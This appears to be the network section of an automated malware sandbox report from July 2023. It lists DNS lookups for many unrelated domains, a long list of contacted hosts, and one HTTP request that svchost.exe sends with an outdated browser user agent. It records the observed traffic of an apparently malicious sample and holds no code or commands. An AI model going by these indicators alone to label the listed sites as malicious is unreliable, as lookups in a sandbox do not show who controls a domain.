                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.817466021 CEST8.8.8.8192.168.2.40x7762No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.862313032 CEST8.8.8.8192.168.2.40x462aNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.862313032 CEST8.8.8.8192.168.2.40x462aNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.918416023 CEST8.8.8.8192.168.2.40x9fdaNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.956788063 CEST8.8.8.8192.168.2.40x8095No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.069618940 CEST8.8.8.8192.168.2.40xff33Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.169394970 CEST8.8.8.8192.168.2.40xc9a9Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.299695969 CEST8.8.8.8192.168.2.40x569No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.397599936 CEST8.8.8.8192.168.2.40x2633No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.453083992 CEST8.8.8.8192.168.2.40xcb7cNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.453083992 CEST8.8.8.8192.168.2.40xcb7cNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.453083992 CEST8.8.8.8192.168.2.40xcb7cNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.497469902 CEST8.8.8.8192.168.2.40x723eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.690265894 CEST8.8.8.8192.168.2.40x11a1No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.690265894 CEST8.8.8.8192.168.2.40x11a1No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.690265894 CEST8.8.8.8192.168.2.40x11a1No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.690265894 CEST8.8.8.8192.168.2.40x11a1No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.788669109 CEST8.8.8.8192.168.2.40xb085Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.959744930 CEST8.8.8.8192.168.2.40xf41bNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:40.965749979 CEST8.8.8.8192.168.2.40x568bNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.083729982 CEST8.8.8.8192.168.2.40x76feNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.083729982 CEST8.8.8.8192.168.2.40x76feNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.083729982 CEST8.8.8.8192.168.2.40x76feNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.083729982 CEST8.8.8.8192.168.2.40x76feNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.180454969 CEST8.8.8.8192.168.2.40xc9a9Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.200702906 CEST8.8.8.8192.168.2.40xf379Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.286957026 CEST8.8.8.8192.168.2.40x407dNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.574700117 CEST8.8.8.8192.168.2.40x57a0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.786494017 CEST8.8.8.8192.168.2.40xb085Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:41.901236057 CEST8.8.8.8192.168.2.40x7c17No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.022998095 CEST8.8.8.8192.168.2.40x132fName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.094846964 CEST8.8.8.8192.168.2.40xc8eNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.195574045 CEST8.8.8.8192.168.2.40x6711No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.195574045 CEST8.8.8.8192.168.2.40x6711No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.195574045 CEST8.8.8.8192.168.2.40x6711No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.195574045 CEST8.8.8.8192.168.2.40x6711No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.205843925 CEST8.8.8.8192.168.2.40x442cNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.368818998 CEST8.8.8.8192.168.2.40x27a3Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.456773043 CEST8.8.8.8192.168.2.40xa9a0Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.523149967 CEST8.8.8.8192.168.2.40x726No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:42.570837975 CEST8.8.8.8192.168.2.40x57a0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.184798002 CEST8.8.8.8192.168.2.40xc9a9Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.192698956 CEST8.8.8.8192.168.2.40x83cdNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.292470932 CEST8.8.8.8192.168.2.40xf40fName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.293813944 CEST8.8.8.8192.168.2.40xdcc2No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.293813944 CEST8.8.8.8192.168.2.40xdcc2No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.293813944 CEST8.8.8.8192.168.2.40xdcc2No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.370150089 CEST8.8.8.8192.168.2.40x6277No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.370150089 CEST8.8.8.8192.168.2.40x6277No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.565165997 CEST8.8.8.8192.168.2.40x94No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.565165997 CEST8.8.8.8192.168.2.40x94No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.565165997 CEST8.8.8.8192.168.2.40x94No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.589982986 CEST8.8.8.8192.168.2.40x57a0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.613043070 CEST8.8.8.8192.168.2.40xc78bNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.613043070 CEST8.8.8.8192.168.2.40xc78bNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.616657972 CEST8.8.8.8192.168.2.40x153No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.667484999 CEST8.8.8.8192.168.2.40x73e1No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.769120932 CEST8.8.8.8192.168.2.40x61d0No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.769120932 CEST8.8.8.8192.168.2.40x61d0No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:43.906644106 CEST8.8.8.8192.168.2.40xb085Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.085937023 CEST8.8.8.8192.168.2.40xca4bNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.088542938 CEST8.8.8.8192.168.2.40x4a10No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.227818012 CEST8.8.8.8192.168.2.40xab3No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.502402067 CEST8.8.8.8192.168.2.40x285dNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.502402067 CEST8.8.8.8192.168.2.40x285dNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.532525063 CEST8.8.8.8192.168.2.40xd6c8Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.538605928 CEST8.8.8.8192.168.2.40xbf78No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.580082893 CEST8.8.8.8192.168.2.40x7155No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.596466064 CEST8.8.8.8192.168.2.40xec04No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.725756884 CEST8.8.8.8192.168.2.40x6897No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.825068951 CEST8.8.8.8192.168.2.40xbed0No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:44.986543894 CEST8.8.8.8192.168.2.40x4756No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.000976086 CEST8.8.8.8192.168.2.40xbd48No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.145159960 CEST8.8.8.8192.168.2.40xee3fNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.440699100 CEST8.8.8.8192.168.2.40xd046No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.440699100 CEST8.8.8.8192.168.2.40xd046No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.667459011 CEST8.8.8.8192.168.2.40x4e08No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.745826006 CEST8.8.8.8192.168.2.40xb597No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.778318882 CEST8.8.8.8192.168.2.40x463fNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.811822891 CEST8.8.8.8192.168.2.40xc192No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.811822891 CEST8.8.8.8192.168.2.40xc192No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:45.962615967 CEST8.8.8.8192.168.2.40xaecdNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.070854902 CEST8.8.8.8192.168.2.40xd6c8Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.118916035 CEST8.8.8.8192.168.2.40x7da7No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.172590017 CEST8.8.8.8192.168.2.40x57a0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.264380932 CEST8.8.8.8192.168.2.40x7f7No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.264380932 CEST8.8.8.8192.168.2.40x7f7No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • flamingorecordings.com
                                                                                                                                                                                                                                                  • hyab.se
                                                                                                                                                                                                                                                  • diamir.de
                                                                                                                                                                                                                                                  • ldh.la.gov
                                                                                                                                                                                                                                                  • nts-web.net
                                                                                                                                                                                                                                                  • orlyhotel.com
                                                                                                                                                                                                                                                  • hyab.com
                                                                                                                                                                                                                                                  • www.diamir.de
                                                                                                                                                                                                                                                  • techtrans.de
                                                                                                                                                                                                                                                  • clinicasanluis.com.co
                                                                                                                                                                                                                                                  • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                  • www.muhr-soehne.de
                                                                                                                                                                                                                                                  • dataform.co.uk
                                                                                                                                                                                                                                                  • www.ftchat.com
                                                                                                                                                                                                                                                  • www.dgmna.com
                                                                                                                                                                                                                                                  • www.jenco.co.uk
                                                                                                                                                                                                                                                  • www.quadlock.com
                                                                                                                                                                                                                                                  • www.pdqhomes.com
                                                                                                                                                                                                                                                  • www.olras.com
                                                                                                                                                                                                                                                  • www.baijaku.com
                                                                                                                                                                                                                                                  • www.pr-park.com
                                                                                                                                                                                                                                                  • www.wkhk.net
                                                                                                                                                                                                                                                  • www.rs-ag.com
                                                                                                                                                                                                                                                  • www.valdal.com
                                                                                                                                                                                                                                                  • www.alteor.cl
                                                                                                                                                                                                                                                  • www.item-pr.com
                                                                                                                                                                                                                                                  • www.elpro.si
                                                                                                                                                                                                                                                  • www.depalo.com
                                                                                                                                                                                                                                                  • www.credo.edu.pl
                                                                                                                                                                                                                                                  • www.tvtools.fi
                                                                                                                                                                                                                                                  • www.nunomira.com
                                                                                                                                                                                                                                                  • www.petsfan.com
                                                                                                                                                                                                                                                  • www.abart.pl
                                                                                                                                                                                                                                                  • www.otena.com
                                                                                                                                                                                                                                                  • www.transsib.com
                                                                                                                                                                                                                                                  • www.vazir.se
                                                                                                                                                                                                                                                  • www.evcpa.com
                                                                                                                                                                                                                                                  • www.t-tre.com
                                                                                                                                                                                                                                                  • www.abdg.com
                                                                                                                                                                                                                                                  • www.xaicom.es
                                                                                                                                                                                                                                                  • www.mqs.com.br
                                                                                                                                                                                                                                                  • www.hummer.hu
                                                                                                                                                                                                                                                  • www.vexcom.com
                                                                                                                                                                                                                                                  • www.naoi-a.com
                                                                                                                                                                                                                                                  • www.ora.ecnet.jp
                                                                                                                                                                                                                                                  • www.waldi.pl
                                                                                                                                                                                                                                                  • www.sjbs.org
                                                                                                                                                                                                                                                  • www.aevga.com
                                                                                                                                                                                                                                                  • www.cokocoko.com
                                                                                                                                                                                                                                                  • www.iamdirt.com
                                                                                                                                                                                                                                                  • www.nelipak.nl
                                                                                                                                                                                                                                                  • www.stnic.co.uk
                                                                                                                                                                                                                                                  • www.wifi4all.nl
                                                                                                                                                                                                                                                  • www.speelhal.net
                                                                                                                                                                                                                                                  • www.holleman.us
                                                                                                                                                                                                                                                  • www.maktraxx.com
                                                                                                                                                                                                                                                  • www.gpthink.com
                                                                                                                                                                                                                                                  • www.findbc.com
                                                                                                                                                                                                                                                  • www.fcwcvt.org
                                                                                                                                                                                                                                                  • www.edimart.hu
                                                                                                                                                                                                                                                  • www.netcr.com
                                                                                                                                                                                                                                                  • www.cel-cpa.com
                                                                                                                                                                                                                                                  • www.c9dd.com
                                                                                                                                                                                                                                                  • www.mobilnic.net
                                                                                                                                                                                                                                                  • www.snugpak.com
                                                                                                                                                                                                                                                  • www.pcgrate.com
                                                                                                                                                                                                                                                  • www.domon.com
                                                                                                                                                                                                                                                  • www.fe-bauer.de
                                                                                                                                                                                                                                                  • www.lrsuk.com
                                                                                                                                                                                                                                                  • www.pwd.org
                                                                                                                                                                                                                                                  • www.kernsafe.com
                                                                                                                                                                                                                                                  • www.pupi.cz
                                                                                                                                                                                                                                                  • www.fink.com
                                                                                                                                                                                                                                                  • www.koz1.net
                                                                                                                                                                                                                                                  • www.nqks.com
                                                                                                                                                                                                                                                  • www.myropcb.com
                                                                                                                                                                                                                                                  • www.yoruksut.com
                                                                                                                                                                                                                                                  • www.medius.si
                                                                                                                                                                                                                                                  • www.ka-mo-me.com
                                                                                                                                                                                                                                                  • www.yocinc.org
                                                                                                                                                                                                                                                  • www.com-sit.com
                                                                                                                                                                                                                                                  • www.vitaindu.com
                                                                                                                                                                                                                                                  • www.jchysk.com
                                                                                                                                                                                                                                                  • www.valselit.com
                                                                                                                                                                                                                                                  • www.dayvo.com
                                                                                                                                                                                                                                                  • www.2print.com
                                                                                                                                                                                                                                                  • www.crcsi.org
                                                                                                                                                                                                                                                  • www.x0c.com
                                                                                                                                                                                                                                                  • www.stajum.com
                                                                                                                                                                                                                                                  • www.ora-ito.com
                                                                                                                                                                                                                                                  • www.tyrns.com
                                                                                                                                                                                                                                                  • www.railbook.net
                                                                                                                                                                                                                                                  • www.spanesi.com
                                                                                                                                                                                                                                                  • www.tc17.com
                                                                                                                                                                                                                                                  • www.jacomfg.com
                                                                                                                                                                                                                                                  • www.fnsds.org
                                                                                                                                                                                                                                                  • www.pohlfood.com
                                                                                                                                                                                                                                                  • www.11tochi.net
                                                                                                                                                                                                                                                  • www.pb-games.com
                                                                                                                                                                                                                                                  • www.sclover3.com
                                                                                                                                                                                                                                                  • aiolos-sa.gr
                                                                                                                                                                                                                                                  • vivastay.com
                                                                                                                                                                                                                                                  • midap.com
                                                                                                                                                                                                                                                  • pertex.com
                                                                                                                                                                                                                                                  • nettle.pl
                                                                                                                                                                                                                                                  • fogra.com.pl
                                                                                                                                                                                                                                                  • cbaben.com
                                                                                                                                                                                                                                                  • cutchie.com
                                                                                                                                                                                                                                                  • bidroll.com
                                                                                                                                                                                                                                                  • htsmx.net
                                                                                                                                                                                                                                                  • assideum.com
                                                                                                                                                                                                                                                  • alexpope.biz
                                                                                                                                                                                                                                                  • pers.com
                                                                                                                                                                                                                                                  • insia.com
                                                                                                                                                                                                                                                  • dbnet.at
                                                                                                                                                                                                                                                  • mcseurope.nl
                                                                                                                                                                                                                                                  • sgk.home.pl
                                                                                                                                                                                                                                                  • softizer.com
                                                                                                                                                                                                                                                  • oozkranj.com
                                                                                                                                                                                                                                                  • zugseil.com
                                                                                                                                                                                                                                                  • coxkitchensandbaths.com
                                                                                                                                                                                                                                                  • ncn.de
                                                                                                                                                                                                                                                  • ramkome.com
                                                                                                                                                                                                                                                  • kevyt.net
                                                                                                                                                                                                                                                  • sigtoa.com
                                                                                                                                                                                                                                                  • kustnara.com
                                                                                                                                                                                                                                                  • apcotex.com
                                                                                                                                                                                                                                                  • dhh.la.gov
                                                                                                                                                                                                                                                  • agulatex.com
                                                                                                                                                                                                                                                  • rokoron.com
                                                                                                                                                                                                                                                  • cjborden.com
                                                                                                                                                                                                                                                  • jnf.at
                                                                                                                                                                                                                                                  • onzcda.com
                                                                                                                                                                                                                                                  • sjbmw.com
                                                                                                                                                                                                                                                  • themark.org
                                                                                                                                                                                                                                                  • araax.com
                                                                                                                                                                                                                                                  • nekono.net
                                                                                                                                                                                                                                                  • biurohera.pl
                                                                                                                                                                                                                                                  • mikihan.com
                                                                                                                                                                                                                                                  • 78san.com
                                                                                                                                                                                                                                                  • sledsport.ru
                                                                                                                                                                                                                                                  • dyag-eng.com
                                                                                                                                                                                                                                                  • okashimo.com
                                                                                                                                                                                                                                                  • absblast.com
                                                                                                                                                                                                                                                  • holp-ai.com
                                                                                                                                                                                                                                                  • tabbles.net
                                                                                                                                                                                                                                                  • johnlyon.org
                                                                                                                                                                                                                                                  • avse.hu
                                                                                                                                                                                                                                                  • hubbikes.com
                                                                                                                                                                                                                                                  • sokuwan.net
                                                                                                                                                                                                                                                  • umcor.am
                                                                                                                                                                                                                                                  • strazynski.pl
                                                                                                                                                                                                                                                  • mackusick.de
                                                                                                                                                                                                                                                  • sinwal.com
                                                                                                                                                                                                                                                  • mackusick.com
                                                                                                                                                                                                                                                  • s5w.com
                                                                                                                                                                                                                                                  • stopllc.com
                                                                                                                                                                                                                                                  • kayoaiba.com
                                                                                                                                                                                                                                                  • impexnc.com
                                                                                                                                                                                                                                                  • indonesiamedia.com
                                                                                                                                                                                                                                                  • metaforacom.com
                                                                                                                                                                                                                                                  • ludomemo.com
                                                                                                                                                                                                                                                  • kewlmail.com
                                                                                                                                                                                                                                                  • reproar.com
                                                                                                                                                                                                                                                  • magicomm.co.uk
                                                                                                                                                                                                                                                  • geecl.com
                                                                                                                                                                                                                                                  • doggybag.org
                                                                                                                                                                                                                                                  • msl-lock.com
                                                                                                                                                                                                                                                  • bible.org
                                                                                                                                                                                                                                                  • cbras.com
                                                                                                                                                                                                                                                  • roewer.de
                                                                                                                                                                                                                                                  • kumaden.com
                                                                                                                                                                                                                                                  • kamptal.at
                                                                                                                                                                                                                                                  • web-york.com
                                                                                                                                                                                                                                                  • snf.it
                                                                                                                                                                                                                                                  • shztm.ru
                                                                                                                                                                                                                                                  • biosolve.com
                                                                                                                                                                                                                                                  • websy.com
                                                                                                                                                                                                                                                  • ccssinc.com
                                                                                                                                                                                                                                                  • angework.com
                                                                                                                                                                                                                                                  • muhr-soehne.de
                                                                                                                                                                                                                                                  • t-mould.com
                                                                                                                                                                                                                                                  • ossir.org
                                                                                                                                                                                                                                                  • bggs.com
                                                                                                                                                                                                                                                  • cpmteam.com
                                                                                                                                                                                                                                                  • simetar.com
                                                                                                                                                                                                                                                  • fifa-ews.com
                                                                                                                                                                                                                                                  • scintel.com
                                                                                                                                                                                                                                                  • refintl.org
                                                                                                                                                                                                                                                  • daytonir.com
                                                                                                                                                                                                                                                  • kavram.com
                                                                                                                                                                                                                                                  • listel.co.jp
                                                                                                                                                                                                                                                  • mijash3.com
                                                                                                                                                                                                                                                  • shanks.co.uk
                                                                                                                                                                                                                                                  • calvinly.com
                                                                                                                                                                                                                                                  • 4locals.net
                                                                                                                                                                                                                                                  • uhsa.edu.ag
                                                                                                                                                                                                                                                  • gbp-jp.com
                                                                                                                                                                                                                                                  • sanfotek.net
                                                                                                                                                                                                                                                  • atbauk.org
                                                                                                                                                                                                                                                  • cvswl.org
                                                                                                                                                                                                                                                  • a-domani.com
                                                                                                                                                                                                                                                  • ludea.cz
                                                                                                                                                                                                                                                  • orbitgas.com
                                                                                                                                                                                                                                                  • lyto.net
                                                                                                                                                                                                                                                  • camamat.com
                                                                                                                                                                                                                                                  • icd-host.com
                                                                                                                                                                                                                                                  • atb-lit.com
                                                                                                                                                                                                                                                  • uster.com
                                                                                                                                                                                                                                                  • kursavto.ru
                                                                                                                                                                                                                                                  • e-kami.net
                                                                                                                                                                                                                                                  • fortknox.bm
                                                                                                                                                                                                                                                  • tozzhin.com
                                                                                                                                                                                                                                                  • duiops.net
                                                                                                                                                                                                                                                  • x96.com
                                                                                                                                                                                                                                                  • envogen.com
                                                                                                                                                                                                                                                  • gujarat.com
                                                                                                                                                                                                                                                  • aoinko.net
                                                                                                                                                                                                                                                  • paraski.org
                                                                                                                                                                                                                                                  • shittas.com
                                                                                                                                                                                                                                                  • ifesnet.com
                                                                                                                                                                                                                                                  • banvari.com
                                                                                                                                                                                                                                                  • ikulani.com
                                                                                                                                                                                                                                                  • mondopp.net
                                                                                                                                                                                                                                                  • bigzz.by
                                                                                                                                                                                                                                                  • wolffkran.de
                                                                                                                                                                                                                                                  • floopis.com
                                                                                                                                                                                                                                                  • com-edit.fr
                                                                                                                                                                                                                                                  • yoruksut.com
                                                                                                                                                                                                                                                  • gydrozo.ru
                                                                                                                                                                                                                                                  • hazmatt.com
                                                                                                                                                                                                                                                  • semuk.com
                                                                                                                                                                                                                                                  • valselit.com
                                                                                                                                                                                                                                                  • bossinst.com
                                                                                                                                                                                                                                                  • rkengg.com
                                                                                                                                                                                                                                                  • wvs-net.de
                                                                                                                                                                                                                                                  • anduran.com
                                                                                                                                                                                                                                                  • infotech.pl
                                                                                                                                                                                                                                                  • cubodown.com
                                                                                                                                                                                                                                                  • wanoa.com
                                                                                                                                                                                                                                                  • gbmfg.com
                                                                                                                                                                                                                                                  • shiner.com
                                                                                                                                                                                                                                                  • touchfam.ca
                                                                                                                                                                                                                                                  • bosado.com
                                                                                                                                                                                                                                                  • riwn.org
                                                                                                                                                                                                                                                  • dspears.com
                                                                                                                                                                                                                                                  • ftchat.com
                                                                                                                                                                                                                                                  • xult.org
                                                                                                                                                                                                                                                  • burstner.ru
                                                                                                                                                                                                                                                  • gcss.com
                                                                                                                                                                                                                                                  • beafin.com
                                                                                                                                                                                                                                                  • webways.com
                                                                                                                                                                                                                                                  • koz1.net
                                                                                                                                                                                                                                                  • aluminox.es
                                                                                                                                                                                                                                                  • nlcv.bas.bg
                                                                                                                                                                                                                                                  • acraloc.com
                                                                                                                                                                                                                                                  • captlfix.com
                                                                                                                                                                                                                                                  • any-s.net
                                                                                                                                                                                                                                                  • shesfit.com
                                                                                                                                                                                                                                                  • deckoviny.cz
                                                                                                                                                                                                                                                  • yhsll.com
                                                                                                                                                                                                                                                  • bount.com.tw
                                                                                                                                                                                                                                                  • pccj.net
                                                                                                                                                                                                                                                  • dayvo.com
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  0192.168.2.45011835.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: flamingorecordings.com
                                                                                                                                                                                                                                                  2023-07-27 19:53:34 UTC0INHTTP/1.1 403 Forbidden
